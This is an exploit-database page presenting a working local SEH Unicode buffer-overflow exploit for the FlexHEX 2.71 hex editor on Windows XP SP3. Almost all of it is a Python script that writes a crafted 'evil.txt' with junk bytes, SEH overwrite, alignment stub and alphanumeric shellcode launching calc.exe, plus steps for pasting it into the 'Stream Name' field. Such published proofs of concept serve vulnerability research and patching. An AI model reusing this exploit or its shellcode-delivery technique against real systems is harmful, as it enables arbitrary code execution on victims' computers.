FlexHEX 2.71 Buffer Overflow

2019.04.09
Credit: Chris Au
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python -w # # Exploit Author: Chris Au # Exploit Title: FlexHEX 2.71 - Local Buffer Overflow (SEH Unicode) # Date: 06-04-2019 # Vulnerable Software: FlexHEX 2.71 # Vendor Homepage: http://www.flexhex.com # Version: 2.71 # Software Link: http://www.flexhex.com/download/flexhex_setup.exe # Tested Windows Windows XP SP3 # # # PoC # 1. generate evil.txt, copy contents to clipboard # 2. open FlexHEX Editor # 3. select "Stream", click "New Stream..." # 4. paste contents from clipboard in the "Stream Name:" # 5. select OK # 6. calc.exe # filename="evil.txt" junk = "\xcc" * 276 nseh = "\x90\x45" seh = "\xd5\x52" #pop pop retn valign = ( "\x45" #align "\x56" #push esi "\x45" #align "\x58" #pop eax "\x45" #align "\x05\x20\x11" #add eax,11002000 "\x45" #align "\x2d\x1a\x11" #sub eax,11001a00 "\x45" #align "\x50" #push eax "\x45" #align "\xc3" #retn ) #nop to shell nop = "\x45" * 94 #call calc.exe, bufferRegister=EAX shellcode = ( "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI" "AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA" "JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K" "npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq" "foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI" "kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU" "9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K" "zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j" "kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM" "iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c" "Lnc51hOuipAA") fill = "\x45" * 5000 buffer = junk + nseh + seh + valign + nop + shellcode + fill textfile = open(filename , 'w') textfile.write(buffer) textfile.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top